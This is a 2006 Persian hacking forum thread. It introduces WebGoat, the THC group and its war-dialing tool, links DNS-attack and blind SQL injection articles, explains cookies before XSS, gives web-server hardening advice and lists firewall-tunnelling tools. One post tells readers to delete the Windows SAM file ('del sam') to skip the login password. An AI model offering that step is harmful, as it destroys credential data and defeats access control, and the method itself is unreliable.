همه کسانی که در دنیای امنیت و هکینگ کار کرده و می کنن یقینا با مباحث وب هکینگ و موضوعات جانبی اون آشنایی دارند و یا حداقل در مورد اون چیزهایی شنیده و یا خوندند و کسانی که بیشتر در این زمینه تخصصی کار کردن به بهرانی بودن این موضوع واقف هستند !! پس واقعا هر شخصی که قصد کار کردن در این زمینه رو داشته باشد باید با مثالهای عملی و واقعی و در انواع مختلف این موضوع را زیره زره بین کنکاش قرار دهد.

:WebGoat یک فریم ورک عالی با قابلیت انعطاف و امکانات می باشد که شما می توانید انواع حملات به برنامه های کاربردی را بر روی آن تست کنید .
موارد کاربرد :
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Cross Site Scripting
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
SQL Injection
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Thread Safety
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Hidden Form Field Manipulation
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Parameter Manipulation
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Weak Session Cookies
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Fail Open Authentication
<LI class=MsoNormal dir=ltr style="MARGIN: 0cm 0cm 0pt 36pt; DIRECTION: ltr; unicode-bidi: embed; TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list 36.0pt">
Dangers of HTML Comments

and many more...

لینک دانلود (http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61824) توضیحات بیشتر .... (http://www.owasp.org/software/webgoat.html)

pastoo
01-10-2006, 00:14
امروز قصد دارم یکی از بهترین و حرفه ای ترین منابع امنیتی حال حاضر دنیا رو به شما علاقه مندان و دوستاران به علم و هنر هک آشنا کنم .این سایت معرف است به انتخاب هکر ها The hacker’s Choice (http://thc.org/) جمعی از هکر های جوان آلمانی در دوران تحصیل خود برای گذراندن اوقات فراقت خود این گروه را ایجاد کردند بعد از گذشت 10 سال هر کدام از این هکر های جوان هم اکنون خود یک پا متخصص امنیتی کامل شده اند و برای سازمان های دولتی مهمی مشغول به فعالیت هم هستند گفته میشود که چند تن از اعضای اصلی این گروه نیز عضو تیم بین المللی نت اسکای میباشند که درستی این مطلب با توجه به برتری و کلاس کاری هکر های این گروه نسبت به دیگر گروه های آلمانی قابل تایید است همانطور که می دانید یکی از کشورهای صاحب هکر های کلاس بالا کشور آلمان است گروه THC یکی از معدود گروه های باقیمانده از دهه 90 میلادی است چند گروه معدود آلمانی نیز از دهه هشتاد میلادی به این طرف هنوز در حال فعالیت هستند ولی اکثر هکر ها و گروه های هکری المان از سال 2000 به این طرف مشغول به فعالیت شده اند لازم به ذکر است که این گروه یکی از ده گروه برتر هک در اجلاس هکرهای کلاه مشکی در سال گذشت میلادی برگزیده است(البته عزیزان به مفهوم اصلی هک یعنی فعالیت هایی همچون تحقیقات امنیتی ارائه برنامه های امنیتی و اعلام آسیب پذیری ها و رفع آنها اشاره نمود نه استناد به سایت هایی همانند زون –آچ و غیره ..مفهوم هک در اینجا چیزی بالاتر از جمله This Site Hacked By… می باشد ) .از نظر من هم واقعا این گروه واین سایت می تواند موردانتخاب هکر ها قرار گیرد .این سایت دارای چندین دایرکتوری است که ازمهمترین آنها می توان به دایرکتوری های Papers که شامل مقالات ارائه شده تو سط اعضای تیم است حتما به این بخش سری بزنید ضرر نخواهید نمود اطلاعات مفید و کاربردی بسیاری را خواهید یافت در تعدادی از این مقالات بعضی متد های جدید هم آموزش داده شده اند بخش بعدی قسمت Release است این بخش هم یکی از پر طرفدارترین بخش های سایت است شما در این سایت با برنامه های امنیتی و هکینگ متعددی که توسط خود اعضای این گروه تهیه و توزیع شده اند آشنا می شوید

چیزی که در مورد این پایگاه اطلاعاتی جالب است هماهنگی بین مقالات گروه و ابزار های ارائه شده است اگر در مقاله ای به ابزار خاصی اشاره شده باشد یا همان ابزار توسط خود اعضای اصلی گروه ایجاد و در اختیار عموم گذاشته شده است و یا در صورت وجود برنامه های متشابه به معرفی اجمالی انها می پردازد

در ادامه من شما را با یک برنامه مربوط به هک سیستمهای تلفنی آشنا میکنیم می توانید آنرا از همین بخش دریافت کنید .از دیگر بخش ها که یکی از قسمت های اصلی و مورد توجه Security Managers و اسکریپت کیدی ها هم هست . بخش ارائه ی سورس اکسپلویت های تهیه شده توسط همین گروه برای آسیب پذیری هایی بعضا جدید می باشد .شاید شما هم با خیلی از سورس اکسپلویت ها بر خوردنموده اید که توسط گروه امنیتی THC تهیه می شوند یکی از مطالبی که همیشه بایستی در دریافت و کامپایل اکسپلویت ها در نظر بگیرید آنست که خود اکسپلویت حاوی Malicious Codes نباشد تا خود بلای جان کاربران نشود متاسفانه آنچه که بر روی شبکه به وفور یافت می شود از همین قبیل سورس اکسپلویت های الوده به قول دوستان چند بعدی است




آیا راهی به این آسانی نیست که اشخاص کم تجربه در زمینه کدینگ سورس اکسپلویت هایی را دریافت کنند و سپس به خیال خام خود آنرا ترجمه کرده و با دست خود سیستمشان را به انواعی از آسیب پیذیری ها همانند درهای پشتی مبتلا سازند .THC یک راه استفاده از منابع معتبر برای دریافت سورس اکسپلویت ها است با مراجعه به اینگونه پایگاهها تا حدی می توانید مطمئن باشید (تا حدی نه مطلق) که مدیران اینگونه پایگا ه ها برای حفظ ابروی علمی خود و سایت معروفشان هم که شده سعی می کنند که موزیگری در برنامه هایشان و همچنین سورس اکسپلویت هایشان در نیاورند . البته از من می شنوید به هیچ سایت بیگانه نمیشود اعتماد کرد براحتی گول اسم بزرگ سایت هایی هم چون Security Focus و غیره را نخورید . به قول یکی از دوستان اینها عاشق چشم و ابروی من و شما نیستند که براحتی برای ما آسیب پذیری کشف کنند و سپس اکسپلویتش را هم در اختیار عموم قرار دهند یا همینجوری برنامه های امنیتی را تهیه نموده و در اختیار ما قرار دهند بلکه به دنبال منافع اطلاعاتی خود هم می گردند در اپدیت های بعدی اگر امکانش بود شما عزیزان را با نمونه هایی مشهوری از این موزیگری شرکت های تولید کننده نرم افزار ها امنیتی و غیره امنیتی آشنا خواهیم نمود مثلا یک نمونه کوچک دزدی اطلاعات شرکت AOL از چندین میلیون کاربر مسنجر خود بود به نحوی که کاربران تحت عنوان نصب یک پچ امنیتی مسنجر به شرکت این اجازه را میدادند که یک سری اطلاعات حساس سیستم هایشان جمع آوری و در دیتایس های شرکت جمع آوری بشوند همین موضوع AOL را نیز یک کراکر نرمافزاری کشف کرده بود حالا به نظر شما ایا می توانید به این همه security Scanner ها که در دست شما عزیزان همه روزه قرار میگیرند اطمینان کامل کنید. حتی به سیستم عامل خود 100% اطمینان دارید ؟!؟!؟!؟ (ببینید در پشت پرده چه خبر است...)

سعی تان بر این باشد که تا حد ممکن از بلاگ ها یا سایت های غیر معتبر سورس های اکسپلویت یا برنامه های امنیتی را دریافت ننمایید با توجه به مطالب فوق بخش اکسپلویت THCو بخش برنامه ها جزو بخش هایی هستند که می توانید تا حد زیادی اطمینان داشته باشید به صحت و درستی عملکردشان ولی بازاحتیاط شرط عقل است

اگر به فرض مثال خواستید یک برنامه اسکنر به عنوان Netrecon را دریافت کنید سعی کنید که ار خود سایت مادر یعنی سیمانتک در یافت کنید نه از سایت هایی مثل پلنگ هکر یا .. البته عده ای هم هستند که حتی به صحت نرم افزار ها از خود سایت های اصلی هم شک دارند و آنها را هم تست میکنند

بخش دیگری در THC هم به نام root در دسترس می باشد که خود از چندین بخش داخلی تشکیل میشود این بخش تا حدودی به صورت عمومی تری به منابع و اطلاعات دیگر سایت ها و همچنین ارائه یک سری تصاویر و هم یک سری ابزار و اسکنرهای دیگر حتما سری هم به این بخش بزنید .در کل پایگاه THC یکی ار معروفترین ها در زمینه امنیت اطلاعات میباشد




معرفی ابزار هک : چند تن از دوستان در مودر برنامه های War Dialing سوالاتی کرده بودند من تصمیم گرفتم که از خود همین پایگاه هم یک ابزار تهیه شده توسط این گروه را معرفی کنم و همچنین یک آموزش تصویری کامل از این ابزار ,نام این ابزار THC-Scan (http://thc.org/download.php?t=r&f=thc-ts20.zip) میباشد حجم این برنامه در حدود 540 KB می باشد (برای دریافت برنامه فوق از http://thc.org/download.php?t=r&f=thc-ts20.zip (http://thc.org/download.php?t=r&f=thc-ts20.zip) استفاده نمایید

آموزش تصویری کامل این برنامه هم در بخش video قابل دریافت است برای دریافت آموزس تصویری ابن ابزار از لینک http://thc.org/root/phun/video/thc-scan2.avi (http://thc.org/root/phun/video/thc-scan2.avi)

استفاده نمایید .حجم این آموزش تصویری در حدود 8.5 MB است برای مشاهده این اموزش نیاز به codec تصویری DivX (http://www.divx.com/) خواهید داشت امیدوارم که با استفاده از منابع موجود دراین پایگاه از قبیل این برنامه و آموزش تصویری مورد نظر بعضی از نیاز های علمی خود را برطرف کنید .

pastoo
01-10-2006, 00:21
مروري بر حملات پروتكل DNS
نويسنده ، اين مقاله را در دو بخش آماده كرده است. بخش اول آشنايي با پروتكل DNS و نحوه عملكرد آن مي باشد و بخش دوم نيز به حملاتي كه روي اين پروتكل صورت مي گيرد ، مي پردازد. در حال حاضر بخش اول اين مقاله آماده مي باشد.

اين مقاله توسط امير ترابي عضو گروه Kapda تهيه شده است.


بخش اول اين مقاله را در قالب يك فايل PDF (http://websecurity.ir/articles/DNS%20Attacking%20Protocol%20Edition%201.pdf) از اينجا دريافت كنيد.


البته این مقاله قبلا داده شده بود ولی در rapidshare بوده که پاک شده

pastoo
01-10-2006, 00:23
ديگر امروزه ندانستن علوم sql Query براي هر هكري واجب مي نمايد .
اما در اين ميان روشهاي نويني براي اين نوع حملات ارائه ميگردد . مثال بارز آن زمانيست كه شما هيچگونه اطلاعات دقيقي از نوع پيكر بندي sql نداريد و نيز بايد دستورات پي در پي را تايپ كنيد .
در آن وقت است كه حمله بروت و فورس كور براي sql به داد ما ميرسد .
http://www.simorgh-ev.com/security/modules/mysections/images/counter.gif (http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=298) http://www.simorgh-ev.com/security/modules/mysections/images/size.gif

pastoo
01-10-2006, 00:38
خوب اینم واسه عزیزانی که از من درخواست کرده بودند در مورد حملات Xss توضیح بدم ... قبل از اینکه

این مطلب رو شروع کنم ذکر چند نکته واجبه ... :
۱-متاسفانه توی هکر ها هر کی رو میبینیم تا اسم Xss میاد ازش فراری هستن یا اصلا ازش اطلاعی
ندارن یا اگر هم اطلاع داشته باشن بهش علاقه ای ندارن ...
و دلایل این چیزی نیست به جز :
۱- اکثرا اعتقاد دارن کد نوشتن برای این آسیب پزیری ها سخت و طاقت فرسا است .....
۲-اصلا ارزش این ها رو ندارد ........
اما این طرز فکر کاملا غلطه چرا که اگر شما علم استفاده از Xss را داشته باشید لونموقع هست که
میگید هیچین چیز کمی هم نیست ...
خوب یرای شروع آموزش کامل در مورد این حملات حتما باید مفهوم کوکی ها رو درک کنید من یه مطلب
کامل در مورد کوکی ها دیدن که دقیقا همونطوری براتون کپی میکنم ... و چون مطلب کامله چیزی
بهش زیاد یا ازش کم نمیکنم :
کوکی cookie چیست؟
انواع مختلفی از کوکی ها وجود دارد و شما در نسخه های جدیدتر وب بروسر ها (Web Browsers) این امکان را دارید که انتخاب کنید کدام کوکی ها برروی کامپیوتر شما ذخیره شوند در صورتی که کوکی ها را کاملا غیر فعال کنید ممکن است بعضی سایت های اینترنتی را نتوانید ببیند و یا از بعضی امکانات مثل به یاد داشتن شناسه و رمز عبور شما در آن سایت محروم شوید و یا انتخاب هایی که داشتید مثل ساعت محلی و یا دمای هوای محلی و کلا از تنظیمات شخصی ای که در آن وب سایت انجام داده اید نتوانید استفاده کنید.

کوکی ها چگونه مورد استفاده قرار می گیرند؟

همانطوری که گفتیم کوکی یک فایل است که توسط یک وب سایت برای حفظ اطلاعات بر روی کامپیوتر شما قرار می گیرد یک کوکی می تواند شامل اطلاعاتی باشد که شما در آن سایت وارد کرده اید مانند ای میل - آدرس - شماره تلفن و سایر اطلاعات شخصی - همچنین کوکی ها می توانند صفحات و یا کارهایی را که در آن وب سایت انجام داده اید مثل تعداد کلیک لینک های بازدید شده و مدت بازدیدرا نیز ضبط کنند. این به سایت کمک می کند تا دفعه بعد که به آن سایت بازگشتید اطلاعات شما را به خاطر داشته باشد و از وارد کردن تکراری اطلاعات خودداری کنید نمونه بارز این مطلب لاگ این ماندن شما در آن سایت است و یا پیغام های Welcome Back و یا حفظ تنظیماتی که درآن سایت انجام داده این به عنوان مثال می توان به خصوصی کردن صفحه My MSN اشاره کرد. نکته ای را که باید به خاطر داشته باشید این است که هر وب سایت فقط می تواند از اطلاعاتی که شما وارد کرده اید استفاده کند نه بیشتر مثلا اگر ای میل خود را در آن سایت وارد نکرده اید آن وب سایت نمی تواند ای میل شما را به دست آورد و یا به سایر اطلاعات کامپیوتر شما دست یابد . مورد دیگر اینکه وب سایت ها فقط می توانند کوکی هایی را که خود ایجاد کرده اند بخوانند و نمی توانند از سایر کوکی های موجود استفاده کنند. وقتی که از یک وب سایت برای بار دوم بازدید می کنید آن وب سایت به دنبال کوکی مربوط به خود می گرد و در صورت وجود از آن استفاده می کند.( البته باز هم با توجه به تنظیماتی که انجام داده اید )

انواع کوکی ها:

کوکی های پایا - دائمی (presistent Cookies):
این نوع کوکی ها به عنوان یک فایل بر روی کامپیوتر شما ذخیره می شوند و بعد از بستن مرورگر اینترنتی شما پاک نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی های مورد استفاده از این نوع هستند.

کوکی های موقت (Temporary Cookies):
کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاک می شوند.
نوع دیگر کوکی های موقت کوکی های زمان دار هستند که زمانی برای کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاک نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند.

کوکی های ناخوشایند؟* (Unsatisfactory cookies)
این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را برای استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید های اینترنتی و سایت امن (SSL*) مورد استفاده قرار می گیرند.

مقایسه کوکی های متعلق به سایت اصلی (First Party) و کوکی های متعلق به سایت های دیگر (Third Party)

دوستان قبل از هر چیز اجازه بدین با دو مفهوم First& third party اشنا شویم این مفاهیم در حقیقت مفاهیم بیمه ای هستند :
First Party: عضو اصلی یک خانواده و یا شرکت صاحب حقوق و مزایای اصلی کسی که بیمه نامه اصلی را داراست (Policy Holder)
Second party : شرکت بیمه کننده
Third Party : هر شخص سومی غیر از این دو کلا بقیه افراد

و اما این مفاهیم در کوکی ها چه معنایی می دهند؟
First Party : کوکی هایی هستند که فقط اطلاعات آنها به سایت که توسط آنها ایجاد شده اند فرستاده می شود و کار آنها همانطور که اشاره شد یادآوری اطلاعات ماست.
Third Party : کوکی هایی هستند که اطلاعات را به چندین سایت مختلف غیر از آنچه بازدید می کنید می فرستند استفاده این کوکی ها معمولا تجاری است بدینگونه که شما از سایتی بازدید می کنید و آن سایت دارای بنرهای تجاری و تبلیغات از سایت دیگری (Third Party) می باشد در اینجاست که کوکی Third Party وارد عمل شده و اطلاعات شما را ثبت می کند به عنوان مثال صاحب تبلیغ با استفاده از این امکان می تواند ببیند که شما چه نوع تبلیغ هایی را بازدید می کنید و در کدام سایت ها. این نوع کوکی هم می توانند از نوع دائمی و هم موقت باشند. اصولا این نوع کوکی ها استاندارد نیستند و توسط مرورگرهای جدید بلوک می شوند. همچنین این کوکی ها ممکن است به هکر ها کمک کنند تا اطلاعات شخصی شما را بدست بیاورند.( برای جلوگیری از آخرین پچ های مرورگر خود استفاده کنید*) اصولا پیشنهاد می شود تا این کوکی ها را که هیچ استفاده مفیدی برای کاربر ندارند بلوک کنید

pastoo
01-10-2006, 00:43
سلام
من رمز عبور ویندوزم رو فراموش کردم admin من هم رمز داره که اون رو نمودونم
آیا ویندوز هم مثل مادر برد ها یوزر وپسورد مادری داره که به شه با اون وارد سیستم شد یا نه در غیر این صورت برای این مشکل چه کار باید بکنم؟
با تشکر




دوستان من این سوال را در بخشش جواب دادم ولی چون دیدم برا خیلی ها ممکنه سوال باشه در این تایپیک هم جواب میدم

خوب عزیزان لازم میدونم اطالاعات کاملی در رابطه با گذر از رمز عبور اینجا بهتون بگم

مراحل زیر را انجان دهید و نتیجه را همین جا اعلام کنید

با دیسکت یا cd استارتاپ وارد محیط داس شوید

برای ویندوز xp باید بدانید که پسورد های ما در فایلی به نام SAM ذخیره میشه

ما قصد پاک کردن این فایل را از سیستم خود داریم

حال این فایل کجا قرار داره ؟ مسیر زیر را دنبال کنید



windows\system32\config


حال به فایل sam دسترسی دارین این فایل را پاک میکنیم با این دستور del sam و بعد اینتر میکنیم و دستگاه را ریست کرده و وارد ویندوز میشویم بدون سوال ورود به ویندوز


دوستان این کار را امتحان کرده و نتیجه را سریعا اطلاع دهید

pastoo
01-10-2006, 17:50
پوشش دادن یا پنهان کردن یک وب سرور شامل از بین بردن جزئیات هویتی ای است که هکرها می توانند برای کشف سیستم عامل و وب سرور نصب شده روی آن مورد استفاده قرار دهند. این اطلاعات در حالی که هیچ استفاده ای برای بهره برداران مشروع ندارد ، اغلب نقطه شروعی برای هکرها می باشد.
دراین مقاله به بررسی برخی راهکارهایی که می توانیم با بکارگیری آنها خطر شناسایی را به حداقل برسانیم ، می پردازد. بیشتر مثالها مربوط به IIS میکروسافت می باشد . زیرا بخاطر آسیب پذیری زیادش به طور وسیعی مورد توجه نفوذگران قرار گرفته است. همچنین یک سری از اقدامات پیشگیرانه شناسایی برای آپاچی سرور نیز ذکر خواهد شد. غیر قابل شناسایی کردن سرور وظیفه همه کسانی است که مسئولیت اجرایی وب سرور را بر عهده دارند.

نفوذگران از اینجا شروع می کنند ، چرا شما از این نقطه شروع نمی کنید ؟
بگذارید از نقطه نظر مهاجمین نگاه کنیم. آسیب پذیریهای امنیتی اتکا بر ورژن و نوع نرم افزار دارند.
یک نفوذ گر برای نفوذ به یک وب سرور باید بداند وب سرور از چه نوعی و دارای چه ورژنی می باشد. دانستن جزئیات یک وب سرور کارآمدی هرگونه تهاجمی را به مقدار زیاد افزایش می دهد.

Server Header ها همه چیز را می گویند:
بسیاری از وب سرورها خودشان و سیستم عاملی را که بر روی آن نصب هستند به هر کسی که بخواهد معرفی می نمایند. با استفاده از ابزارهای بررسی شبکه مانندSam Spade یا Header Check می توانید http هدرهای سرور را تشخیص دهید. تنها کافیست Home Page وب سایت را درخواست نموده وhttp هدرهای حاصله یا بنرهایی که توسط سرور ارسال گردیده را مورد بررسی قرار دهید. در میان آنها احتمالا چیزی شبیه به Server : Microsoft – IIS/5.0 پیدا خواهید کرد.
آپاچی سرور نیز به صورت پیش فرض همه مشخصات را اعلام می کند.
Server : Apache/2.0.41-dev(unix)
کاربران آپاچی سرور 2.x دارای مدول Mod Header هستند . این کاربران می توانند به سادگی فایل httpd.conf را به صورت زیر ادیت نمایند :
Header Set Server "New Server Name"
متاسفانه در نسخه های پیشین آپاچی سرور نمی توان سرور هدرها را تغییر داد.
کاربران IISنیز می توانند Lock Down را نصب نموده و برای برداشتن وجایگزین کردن هدرها از فایل پیکره بندیURLScans استفاده نمایند. در صورتی که از سرور Cold Fusion استفاده می نمایید و می خواهید URLScans را به کار برید بسیار محتاط باشید. زیرا روشی که در حال حاضر هدرها را جایگزین
می نماید باعث خسارات سنگینی به صفحات CFM می گردد. در این حالت تنها راه ممکن برداشتن هدرهاست.

پسوند فایلها :
نمایش پسوند فایلها مانند .ASP یا .ASPX به طور مشخص نشان دهنده آن است که شما از یک سرور
میکرو سافت استفاده می کنید. به طور کلی پنهان کردن پسوند فایلها کار مفیدی است. در طراحی سایتها سعی کنید ازHTML و Java استفاده کنید. پسوند فایلهای طراحی شده توسط این زبانها نشان دهنده نوع وب سرور نمی باشد.
در مورد آپاچی سرور به مدول mod negotiation توجه خاصی داشته باشید. بوسیله این مدول می توانید پسوند فایلها را مخفی کنید. همچنین توسط mod header می توان پسوند فایلها را تعویض نمود.
کاربران IIS نیز می توانند از برنامه PageXChanger برای پنهان ساختن پسوند فایلها استفاده نمایند.

ASP Session ID Cookie:
این کوکی ها وظیفه حفظ وضعیت سرویس گیرنده را بر عهده دارند و به سادگی سیستم عامل و وب سرور نصب شده بر روی آن را مشخص می کنند.
Set –Cookie:ASPESSIONIDQGQGGWFC=MGMLNKMDENPEOPIJHPOPEPPB;
شما می توانید ASP Session State را از کار بیندازید. همچنین می توانید برای تغییر اسامی کوکی ها از یک فیلتر ISAPI استفاده نمایید. از طرفی ASP Session ها باعث محدود شدن منابع سیستم می گردند. از کار انداختن آن به بهبود اجرایی ASP کمک می کند و باعث گمنام ماندن سرور شما نیز می گردد.

WebDAV:
راه دیگر شناسایی سرورهای ویندوزی WebDAV می باشد. WebDAV منحصر به میکروسافت یا IIS نمی باشد ، بلکه یک استاندارد پیشنهادی (RFC 2518) با گروه کاری IETF است. سرور ویندوزی در حالت پشتیبانی WebDAV اطلاعات زیادی را به هدر می افزاید که می تواند مورد استفاده هکرها قرارگیرد. در صورتیکه از WebDAV برای پشتیبانی Web Folders , Outlook Web Access یا ... استفاده
نمی نمایید، می توانید با استفاده ازIISLockDown یا تغییر در رجیستری آن را از کار بیندازید.

هدرهای دیگر:
برخی از سرورهای وب به وسیله نمایش هدرهای خاص در پاسخهای HTTP هویت خود را فاش
می سازند. هدرهای X-Powered-By و X-ASPNET-Version علائم بارزی هستند که نشان دهنده استفاده از ASP.NET و بنابراین میزبانی IIS می باشند. همچنین به یاد داشته هدرهای
Microsoft Office Web Server را باید مخفی کنید.

Windows Authentication:
کاربران IIS نباید Windows Authentication را به عنوان راهی برای پنهان نمودن اطلاعات بر روی سرور مورد استفاده قرار دهند. زیرا این شیوه اطلاعات زیادی را در مورد سرور بر ملا می سازد. یک هکر
می تواند با توجه به هدرهای Authentication WW- نوع وب سرور را مشخص نماید. زمانی که یک فایل یا فلدر توسط پروسه Authentication ویندوز محافظت می شود، درهدرهای فرستاده شده از طرف سرور String NTLM وجود دارد که می تواند مورد بهره برداری هکر قرار گیرد.

پیام های پیش فرض:
پیامها ، صفحات و اسکریپتهای پیش فرض نیز باعث شناسایی وب سرور می گردد. اغلب نرم افزارهای پشتیبانی کننده وب سرور دارای پیغامهای پیش فرض هستند که باید به گونه ای مناسب تغییر پیدا کند. همچنین تمام Administration Pages ، اسکریپتها وDocument هایی که همراه با وب سرور نصب می شوند باید مخفی یا پاک شوند.

دیگر سرویسها:
بسیاری از کامپیوترهایی که با عنوان وب سرور استفاده می شوند ، جدا از خدمات HTTP خدمات دیگری مانند SMTP و FTP را ارائه می دهند. به عنوان یک قانون امنیتی سعی کنید چنین سرویسهایی را در وب سرور خود راه اندازی نکنید. به ویژه از سرویسهای پیش فرض FTP و SMTP در میکرو سافت IIS اجتناب کنید. زمانی که یک ارتباط با سرویس SMTP برقرار می گردد. یک پیغام خوشامد گویی برای Client فرستاده می شود. این پیغام هیچ تاثیری در سرویس ایمیل ندارد. اما مشابه هدرهای HTTP اطلاعاتی را در مورد وب سرور بر ملا می سازند. سرویس پیش فرض SMTP ویندوز چنین اطلاعاتی را نمایان می سازد . همچنین سرور پیش فرض IIS FTP یک بنر شناخته شده را ارائه می دهد . از آنجایی که اصلاح این بنر از اصلاح بنر SMTP پروسه پیچیده تری است بهترین راه جایگزینی آن با یک FTP سرور دیگر مانند RhinoSoft's Serv-U FTP Serverاست . که بتوان هرگونه پیغامی را در بنر FTP نمایش داد. همچنین این FTP سرور دارای امتیازات دیگری نیز از نظر ایمنی می باشد.
ورودهای غیر مجاز :
بسیاری از Exploits ها از یک URL پیچیده برای گرفتن شل (Shell ) یا کنترل یک CGI Program استفاده میکنند که هکر بوسیله آنها می تواند لیستی از فایلها سیستم عامل را بدست آورد. بهترین روش برای مقابله با اینگونه حملات استفاده از یک فیلتر داده می باشد که کاراکترهای غیر قابل قبول مثل متا کاراکترها را از اطلاعاتی که توسط کاربر وارد می شود حذف نماید. برای IIS استاندارد جاری IISLockDown/URL Scan است. نسل جدیدی از Firewall ها نیز قابلیت پشتیبانی از لایه های کاربردی Web Server را دارا هستند.

پشته ها:
حتی زمانیکه علائم افشاگرانه از روی لایه کاربردی وب سرور حذف شد ، بر روی لایه های پایین تر شبکه نقاط ضعف آشکارسازی باقی می ماند. هر سروری با یک اتصال شبکه دارای یک Network Protocol است که قابل اسکن و شناسایی می باشد ، بهترین اسکنرهای پشته مانند NMAP می تواند با استفاده از تکنیکهای مختلف سیستم عامل را شناسایی کند. همچنین پشته IP مربوط به هر سیستم عامل نیز در مقابل شناسایی از طریق پروتوکل ICMP آسیپ پذیر است. اولین راه مقابله با این نوع آسیب پذیری ها استفاده از یک فایروال می باشد. به این نکته توجه داشته باشید که با وجود فایروال ، یک تحلیل شبکه ای دقیق هنوز هم می تواند نوع وب سرور را مشخص سازد.

Netcraft:
در سایت Netcraft با وارد نمودن URL هر وب سایت می توان به اطلاعاتی در مورد سیستم عامل و وب سرور آن سایت بدست آورد. با تغییر دادن HTTP هدرها می توان کاری کرد که گزارش Netcraft اشتباه شود. همچنین با حذف HTTP هدرها ، Netcraftگزارش ناشناس بودن وب سرور را ارائه خواهد کرد.

پیش فرضهای :TCP/IP
احتمالاً هنوز سیستم عامل شما حتی از پشت یک دیوار آهنین نیز مورد شناسائی قرار خواهد گرفت. برای آنکه بتوان یک سیستم عامل را به طور کامل ناشناس کرد باید برخی از پیش فرض های محیط IP/TCP مانند (Receive Window size) RWIN ، (Maximum Transmission Units) MTU ، MSS (Maximums Segment Size) ، (Time-to-Live) TTL دستکاری شود . در زمان تغییر دادن این پیش فرض ها بسیار محتاط باشید زیرا می تواند تاثیر معکوس بر روی وب سرور داشته و یا سیستم عامل را به طور کامل فلج سازد.
به خاطر داشته باشید :
برای آنکه وب سرور شما کاملاً ناشناخته بماند باید تمام مواردی که در بالا ذکر شده است را بصورت ترکیبی به کار برید. همیشه به یاد داشته باشید این اقدامات پیشگیرانه تنها می تواند باعث شکست اکثر نفوذ گران گردد نه همه آنها. یک نفوذگر ماهر و مصمم می تواند از تمامی این سدها عبور کند...

pastoo
02-10-2006, 02:07
httptunnel




این ابزار یک راه دو طرفه مجازی توسط در خواست های پروتکل http ایجاد میکند ، این ابزار قابلیت استفاده از http ***** را هم در صورت تمایل و ایجاد پیکربندی مناسب دارد !! این ابزار بیشتر به درد کسانی که پشت یک دیوار آتشین گیر افتاده اند میخورد . این ابزار توسط Lars Brinkhoff تهیه شده و تحت پلت فورم Linux قابل اجرا است و تحت پروانه GUN میباشد .




Home : http://www.nocrew.org/software/httptunnel.html (http://www.nocrew.org/software/httptunnel.html)




12tpd




یک ابزار بسیار علی است ، به شخصه به این ابزار علاقه وافری دارم !! و به شدت استفاده از آن را به اهل فن توصیه میکنم ، این ابزار با استفاده از دو لایه تونل و استفاده از پروتکل VPN قابلیت های بسیاری دست یافته است .این ابزار تحت پلت فورم Linux قابل اجرا است و تحت پروانه GUN میباشد .




Home : http://www.l2tpd.org/ (http://www.l2tpd.org/)




Stunnel




این ابزار به شما اجازه میدهد که اتصالات خود را که تحت پروتکل TCP است به وسیله پروتکل SSL به حالت محرمانه در آورده و ارسال و دریافت کنید .البته قابلیت های دیگری هم دارد ...




Home : http://www.stunnel.org/ (http://www.stunnel.org/)




svtun




ابزار Vtun با قرار دادن اطلاعات در کپسول ها با استفاده از پروتکل tcp و udp و پشتیبانی از رمز کردن و فشرده سازی اطلاعات یکی از بهترین ابزار ها در این باب میباشد !! قابل ذکر است که این برنامه تحت پروانه GUN میباشد .




Home : http://www.cs.tau.ac.il/~nnavi/vtun/ (http://www.cs.tau.ac.il/~nnavi/vtun/)




UDPTunnel




خوب اسم ابزار گویای همه چیز است !!پس ...




Home : http://www1.cs.columbia.edu/~lennox/udptunnel/ (http://www1.cs.columbia.edu/~lennox/udptunnel/)




zebedee




